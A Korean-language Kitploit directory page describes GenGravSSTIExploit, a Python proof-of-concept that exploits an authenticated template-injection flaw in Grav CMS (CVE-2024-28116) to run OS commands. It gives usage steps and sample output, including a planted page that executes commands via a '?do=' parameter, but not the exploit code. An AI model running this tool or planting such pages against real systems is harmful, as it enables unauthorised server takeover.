Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/geniuszly/gengravsstiexploit
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationLearning & Education
GitHubgeniuszly/gengravsstiexploit

GenGravSSTIExploit

는 Grav CMS 버전 1.7.44 이하(CVE-2024-28116)에서 인증된 서버 사이드 템플릿 인젝션(SSTI) 취약점을 악용하는 PoC Python 스크립트입니다.

저장소 보기
72371년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

EN

GenGravSSTIExploit는 Grav CMS 버전 <= 1.7.44(CVE-2024-28116)에서 인증된 서버 측 템플릿 인젝션(SSTI) 취약점을 악용하는 PoC Python 스크립트입니다. 이 취약점은 편집자 권한을 가진 사용자가 원격 서버에서 OS 명령을 실행할 수 있도록 합니다.

참고: 이 스크립트는 Grav CMS 콘솔에서 인증을 받기 위해 유효한 자격 증명이 필요합니다.

특징

  • 편집자 자격 증명을 사용하여 Grav CMS 관리자 패널에 인증합니다.
  • 페이로드를 주입하기 위해 CMS에 새 페이지를 생성합니다.
  • SSTI 취약점을 이용하여 OS 명령을 원격으로 실행합니다.

요구 사항

  • Python 3.x
  • requests 라이브러리 (pip install requests로 설치)

사용법

  1. 저장소 클론

    root@kitploit:~
    git clone https://github.com/geniuszly/GenGravSSTIExploit
    cd GenGravSSTIExploit
    
  2. 자격 증명 설정

    Grav CMS 편집자 자격 증명을 제공하도록 스크립트를 편집하세요:

    root@kitploit:~
    GRAV_USER = "youruser"
    GRAV_PASSWORD = "yourpassword"
    
  3. 스크립트 실행

    다음 명령어로 스크립트를 실행하세요:

    root@kitploit:~
    python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
    
    • <TARGET_URL>: http[s]://hostname 형식의 대상 URL.
    • <PORT>: 포트 번호 (기본값 80).

    예시:

    root@kitploit:~
    python GenGravSSTIExploit.py -t http://example.com -p 8080
    
  4. 익스플로잇과 상호 작용

    익스플로잇이 성공하면 OS 명령을 실행할 수 있는 URL이 제공됩니다:

    root@kitploit:~
    [+] RCE payload injected. Visit the malicious page: http://example.com:8080/poc_<ID>?do=<command>
    

예시 출력

root@kitploit:~
  python GenGravSSTIExploit.py -t http://example.com -p 8080

스크립트는 각 단계를 수행하며 터미널을 통해 업데이트를 제공합니다. 다음과 같은 내용이 표시될 수 있습니다:

root@kitploit:~
2024-10-02 12:00:01 - INFO - Checking target URL...
2024-10-02 12:00:02 - INFO - Getting session cookie and login-nonce...
2024-10-02 12:00:03 - INFO - Attempting authentication in Grav CMS...
2024-10-02 12:00:04 - INFO - Accessing admin panel after authentication...
2024-10-02 12:00:05 - INFO - Creating new page...
2024-10-02 12:00:06 - INFO - Getting form-nonce and unique_form_id...
2024-10-02 12:00:07 - INFO - Injecting RCE payload...
2024-10-02 12:00:08 - INFO - [+] RCE injection successful. Visit: http://example.com:8080/poc_4T7B?do=<command>

스크립트 실행이 완료되면 주입된 페이지로 연결되는 링크와 함께 메시지가 표시됩니다. 이 링크를 방문하여 OS 명령을 실행할 수 있습니다:

root@kitploit:~
http://example.com:8080/poc_4T7B?do=whoami

지정된 명령으로 URL을 방문하면 출력이 페이지에 직접 표시됩니다:

root@kitploit:~
Cmd-Output:
root

면책 조항

이 도구는 교육 목적으로만 제공됩니다. 책임감 있게 사용하고, 명시적 허가를 받은 시스템에서만 사용하십시오. 저자는 이 스크립트로 인한 오용이나 손해에 대해 책임을 지지 않습니다.

도구 다운로드